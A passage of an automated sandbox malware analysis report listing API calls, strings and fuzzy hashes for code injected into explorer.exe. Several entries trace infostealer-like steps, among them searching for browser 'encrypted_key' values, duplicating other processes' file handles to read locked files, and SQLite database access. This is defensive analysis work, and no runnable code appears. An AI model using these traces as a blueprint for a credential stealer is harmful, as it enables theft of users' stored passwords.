Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E01F82

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: b6322e85970d860a3be38661ca46911e0791eedab0e9f697b53a71a1614637c9
Instruction ID: 76d9dad3e5a41ecf34ec90ece33033bc4419772a0e5f41e2b27962da88695843
Opcode Fuzzy Hash: b6322e85970d860a3be38661ca46911e0791eedab0e9f697b53a71a1614637c9
Instruction Fuzzy Hash: 8E218E712083016FDB159B21CC49E2FBBEDEFC8354F40592DF899A2190DB35C9499B22

Function 00E01C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00E03E1E,00000000,?,00E03FA8), ref: 00E01C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00E03FA8), ref: 00E01C56
CloseHandle.KERNEL32(00000000,?,00E03FA8), ref: 00E01C91

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00E03FA8), ref: 00E01C76

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 56965d0e9367b45dfdd4395cfec3125e96926cbb576bbaf8b616967923a3e698
Instruction ID: dda121a35504da73eb568eadf9f0284bf148ea43d2a1336e0f3120dca8e38363
Opcode Fuzzy Hash: 56965d0e9367b45dfdd4395cfec3125e96926cbb576bbaf8b616967923a3e698
Instruction Fuzzy Hash: BCF081312002186FD2281B26DC88E7BBA9CDB467BAB160759F515A71D0EB129C854171

Function 00E02FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00E03E30,00000000,00000000,?,00E03FA8), ref: 00E02FC1
lstrlen.KERNEL32("encrypted_key":",?,00E03FA8), ref: 00E02FCE
StrStrIA.SHLWAPI("encrypted_key":",00E5692C,?,00E03FA8), ref: 00E02FDD

Part of subcall function 00E0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00E02783), ref: 00E0192B
Part of subcall function 00E0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00E02783), ref: 00E01930
Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,?), ref: 00E01946
Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00E0194A

Strings

"encrypted_key":", xrefs: 00E02FBA, 00E02FBF, 00E02FCD, 00E02FDC

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: eba4f14c6a6673ea7d388bb0b8e25923d844c4b8e5136af1ee5a9c9f2dd308fa
Instruction ID: 6933742d6b57a5a29f842f043454bb11d97aa443b3af4f3b2d3db1b861a83bd1
Opcode Fuzzy Hash: eba4f14c6a6673ea7d388bb0b8e25923d844c4b8e5136af1ee5a9c9f2dd308fa
Instruction Fuzzy Hash: E1E0222270AB251FC3A66BB61C488573FAC9F422563841068F605F7163DE928849C2A8

Function 00E0BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 00E0BB40

Strings

winDelete, xrefs: 00E0BB6A

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID: winDelete
API String ID: 3188754299-3936022152
Opcode ID: 34cdda06f5e4af04fad7923f36ef6366af7488af0057c2479a5a456589c22e7a
Instruction ID: a99f48e3c381efd4a93816e0d252a961fe432cd572f1b11e2b6815d08881104a
Opcode Fuzzy Hash: 34cdda06f5e4af04fad7923f36ef6366af7488af0057c2479a5a456589c22e7a
Instruction Fuzzy Hash: 19110431A00208EBC711ABB998419BE77B5FF91760F146165F802F72D8DB308D81DB52

Function 00E02EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00E02EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E02F54
RegCloseKey.KERNELBASE(?), ref: 00E02F62

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: 95f232e294edbd51ab336015225d27b7ed4ed2e7cb3f0d774ed64ef382fc8060
Instruction ID: 6dbcd42678fb63579ef878936ce103dc4f9eb472c22e91d70807dc80c792c34c
Opcode Fuzzy Hash: 95f232e294edbd51ab336015225d27b7ed4ed2e7cb3f0d774ed64ef382fc8060
Instruction Fuzzy Hash: F7016231204251AFCB159F22DC09DAF7BEAEFC4391F00442DFA59B61D1DA3588C9EBA1

Function 00E04B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E04B74
CoUninitialize.COMBASE ref: 00E04B83
ExitProcess.KERNEL32 ref: 00E04B8B

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: 37050cf9af7f67a6a4b50207181ab94c197afbe7c2c1910909e43ea8093fc221
Instruction ID: 5189a028661188a703ff0da0f2178b79d766a5954b7d6617e048adbaeaf8a14a
Opcode Fuzzy Hash: 37050cf9af7f67a6a4b50207181ab94c197afbe7c2c1910909e43ea8093fc221
Instruction Fuzzy Hash: 35C04CB53453004FE6842BE25E0D7193664AB00717F405904F309B60E1DA5044448A22

Function 00E09FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00E09FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 00E0A00E

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: ed77fe1b2868281caef6406c61e0ce8a1d1b3d1ec22b700f8f4ec08e68b1a734
Instruction ID: 47eab53500f450e410b142625996185959b9b79804e15344affd67c5021eb286
Opcode Fuzzy Hash: ed77fe1b2868281caef6406c61e0ce8a1d1b3d1ec22b700f8f4ec08e68b1a734
Instruction Fuzzy Hash: 5FF02B72708346BEE7311A95AC84F77679DDBA47C9F181829F985F31C2E6B1AC808331

Function 00E01AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00E02E83,PathToExe,00000000,00000000), ref: 00E01B16

Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027

Part of subcall function 00E019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
Part of subcall function 00E019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00E01B40

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: 301a25de32bc6681784318758c35db68309d422ed93fa71ca7dffa18cad8ef0b
Instruction ID: 6c6d7b4c57bbb2232aed08abcc26c26137c48d8d9ab88cbcf8db1cabc313674a
Opcode Fuzzy Hash: 301a25de32bc6681784318758c35db68309d422ed93fa71ca7dffa18cad8ef0b
Instruction Fuzzy Hash: ECF02422700A4867DA122A2ADC80E37378FCBD13EB30601AEF559BB281EE166CC05660

Function 00E0A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00E0A35F

Strings

winSeekFile, xrefs: 00E0A381

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: FilePointer
String ID: winSeekFile
API String ID: 973152223-3168307952
Opcode ID: 8cfed313ee61a8aa8bc95cb83e82d1ee1e10ca3069d6d84b099a59f401ce3f56
Instruction ID: 2056779824c6276fab765b162d7c41b76a74147c556ac1feced78bb9ef248caf
Opcode Fuzzy Hash: 8cfed313ee61a8aa8bc95cb83e82d1ee1e10ca3069d6d84b099a59f401ce3f56
Instruction Fuzzy Hash: 8EF0B430615308AFD7229F64EC019BB77A9EB44321F188779F861E62D0DA70DD5496A1

Function 00E09EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(053E0000,00000000,?), ref: 00E09EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00E09ECD

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 6574da4c4cfea4735f8c9ad8cb54a4448089867f8fd7ef35adc53d4c5de30d94
Instruction ID: c32e0b5642780079ab76c27356db96f2f68fbdf844a97fa34f1480e20f81c33e
Opcode Fuzzy Hash: 6574da4c4cfea4735f8c9ad8cb54a4448089867f8fd7ef35adc53d4c5de30d94
Instruction Fuzzy Hash: B1E0C233A482117FC2132B85BC05F2FB7A8DB94F90F051059FA80B22A2C6B0AC55C7A2

Function 00E09EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(053E0000,00000000,?), ref: 00E09EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 00E09F0E

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: a939a0be50b6bde47cfd28123c69c81f12a5c7f8dab952e08a3772b5e98381dd
Instruction ID: 83a84a1993c382f8163b37886d8f4223eafecf1597db893622e1e3a385e651bd
Opcode Fuzzy Hash: a939a0be50b6bde47cfd28123c69c81f12a5c7f8dab952e08a3772b5e98381dd
Instruction Fuzzy Hash: 47D0C2326083027FC2011B91BC02F3B77789B90B40F081448F200B10E7C7A06494AB61

Function 00E01B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
CloseHandle.KERNELBASE(00000000), ref: 00E01B8F

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: b7a239208c0c739d3fa814ad16aef07488cb4e5aab2753a7c7ab3d8d03f6f982
Instruction ID: 8f280edc097df92739f91e6cfef49643bf7f0aa5798d118b97ec22f3ca3ec5bf
Opcode Fuzzy Hash: b7a239208c0c739d3fa814ad16aef07488cb4e5aab2753a7c7ab3d8d03f6f982
Instruction Fuzzy Hash: 9FD0EC61252630A6D5B516267C08EA76E1C9F027BAB440A54B41DAA0D0E2148C8785E0

Function 00E01011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00E0116F

GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 3ab24bf442019676df4ad7c162703e14ec594ec4a9f3217d5aa3785074f06ba2
Instruction ID: d233ff473386d8e4ae1be23bd7e467761cfd2beb519f6a742c6435c9610bd668
Opcode Fuzzy Hash: 3ab24bf442019676df4ad7c162703e14ec594ec4a9f3217d5aa3785074f06ba2
Instruction Fuzzy Hash: 0BC08C310023205AC9A827A13E0CBDA2B08CF09367F000881B509BB182CA618C8486A0

Function 00E01000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b04f9f331e3b427d85b2287052032de1a99c5561a16d8d5942b5c67c7acfb7f8
Instruction ID: 194093383e120f23f21e3b2901c1e5302025a93c9ce789be568030032e45916b
Opcode Fuzzy Hash: b04f9f331e3b427d85b2287052032de1a99c5561a16d8d5942b5c67c7acfb7f8
Instruction Fuzzy Hash: BEA002755517045FDD4857B59F0DA2A3518F744703F504944714997452D96454088721

Function 00E012A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 00E012B5

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: 14dc950f9cb4677e9432d213175ddfd027c682178344c0bf92a2716f59a8772c
Instruction ID: 01ba7b2600a331496ea502b38a1afe65c7361101ad847d4ec1f32700a58f80d1
Opcode Fuzzy Hash: 14dc950f9cb4677e9432d213175ddfd027c682178344c0bf92a2716f59a8772c
Instruction Fuzzy Hash: 8A110AB1A01209AFDB14DFA5D984ABEBBFCFB08341B504469F949E7250D734DD44CB60

Function 00E01B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00E02C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E01BAA

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a5fbc0def6f069978281ad8b6b11f44ecc153c902b8b094e9a81f0c9fd6ee79d
Instruction ID: b21cd452484c5e4c5e794f351e846e050cb77fb4d57bf2adc655d4a3f0590dca
Opcode Fuzzy Hash: a5fbc0def6f069978281ad8b6b11f44ecc153c902b8b094e9a81f0c9fd6ee79d
Instruction Fuzzy Hash: E7D0A933E02530C2CA7816783844892B2806B0077A31A07F4FC26FB0D0E324CCC246C0

Function 00E01677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E01684

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: e8585562ef7d240a40fee2eca441dd4114544a2f2b57154f25ca03760c7085ec
Instruction ID: caf812863aa3a47c2dabe3362dfbadfc11c0ed9ab620e01b1167c726afbef7d8
Opcode Fuzzy Hash: e8585562ef7d240a40fee2eca441dd4114544a2f2b57154f25ca03760c7085ec
Instruction Fuzzy Hash: 26C08C30120331DFE7701BB09C09B8636D4AF197B3F060E6AE0C1AE0D0E2F508C0CA90

Function 00E0104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00E0158A), ref: 00E01056

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b6d5e05c98cbc75ad26228d362c5aa671b552225b08355e5e3616d4ee449b4b0
Instruction ID: 89bd59d3fe283e3ad87681be6669c05bb317118a0800f22afb6d1ba113f3d6c9
Opcode Fuzzy Hash: b6d5e05c98cbc75ad26228d362c5aa671b552225b08355e5e3616d4ee449b4b0
Instruction Fuzzy Hash: 92A001B07953006AFDA95762AE1BF1529289740B02F500644B3097D0D055E465048529

Function 00E0105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,00E04A5B,?,?,00000000,?,?,?,?,00E04B66,?), ref: 00E01065

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: bcb7b70a5203dee4e56e62d340c0e91d4d215d9bed08b70fd2ddee0056b3aef2
Instruction ID: dd3cf5a159468466dc46d75a0f88e634956495092adad28a7b8e18b0a582560f
Opcode Fuzzy Hash: bcb7b70a5203dee4e56e62d340c0e91d4d215d9bed08b70fd2ddee0056b3aef2
Instruction Fuzzy Hash: A9A00270691B006AEDF857215E0AF1526146740B03F6049447245BA0D14DA5E0488A18

Non-executed Functions

Function 00E0349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 00E034C0

Part of subcall function 00E033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00E03401

OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00E037A8), ref: 00E034E9

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00E0351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00E03541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00E03586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 00E0358F
lstrcmpiW.KERNEL32(00000000,File), ref: 00E035B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 00E035DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00E035F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00E03606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 00E0361E
GetFileSize.KERNEL32(?,00000000), ref: 00E03631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00E03658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00E0366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E03681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00E036AD
CloseHandle.KERNEL32(?), ref: 00E036C0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00E037A8), ref: 00E036F5

Part of subcall function 00E01C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00E01CC0
Part of subcall function 00E01C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00E01CDA
Part of subcall function 00E01C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00E01CE6

CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00E037A8), ref: 00E03707

Strings

File, xrefs: 00E035B0

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 7aa6a0b7e64fd0fa7699c12489a8e45d4430022ac48351a75ad68a27dfabe539
Instruction ID: c4d273d86cff7dfe664de9879aee13ad4f913f30028a2c5a9612ce8ef87263a5
Opcode Fuzzy Hash: 7aa6a0b7e64fd0fa7699c12489a8e45d4430022ac48351a75ad68a27dfabe539
Instruction Fuzzy Hash: CF618D70204300AFD724AF71DC84B2B7BEDEB84755F401928F986B72E1DB75DA888B51

Function 00E54438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00E54502
memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 00E5475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00E54803

Strings

%s mode not allowed: %s, xrefs: 00E547D0
no such %s mode: %s, xrefs: 00E54784
file, xrefs: 00E54474
invalid uri authority: %.*s, xrefs: 00E54513
no such vfs: %s, xrefs: 00E5482F
cache, xrefs: 00E546FA
access, xrefs: 00E54725
mode, xrefs: 00E54712
cach, xrefs: 00E546DC
localhost, xrefs: 00E544FD

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: c7471a6fa36217756bb9e612786e3a91c85850d75a61aac92ae01367832063c1
Instruction ID: b9d86a7eea299a9674a928eec21c399f9182d2090d57de77d9e8c3b7297b6a32
Opcode Fuzzy Hash: c7471a6fa36217756bb9e612786e3a91c85850d75a61aac92ae01367832063c1
Instruction Fuzzy Hash: 20C1F2F0A083459BDB348E18849076AB7D1AB8A31EF142D6EECD5B72C2D774D8CD8752

Function 00E25F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 00E06AAA: memset.NTDLL ref: 00E06AC5

memset.NTDLL ref: 00E25F53

Strings

no such column: "%s", xrefs: 00E26271
cannot open virtual table: %s, xrefs: 00E25FAA
indexed, xrefs: 00E260E8
foreign key, xrefs: 00E260A3
cannot open view: %s, xrefs: 00E25FF3
cannot open table without rowid: %s, xrefs: 00E25FCF
cannot open %s column for writing, xrefs: 00E26255

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: d529eaa6fac02c3e7f76456c0c690c7b35bea7645ce660dc7fc7d8a02e104475
Instruction ID: 26923915b0ad1f39d38a21fbf02ad761e945dcf2ab2a1f06d1468d5cbb1cef83
Opcode Fuzzy Hash: d529eaa6fac02c3e7f76456c0c690c7b35bea7645ce660dc7fc7d8a02e104475
Instruction Fuzzy Hash: A3C1A0716047129FCB14DF24D580A2AB7E2BFC8704F14AA1DF889A7291DB31ED56CB92

Function 00E04440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

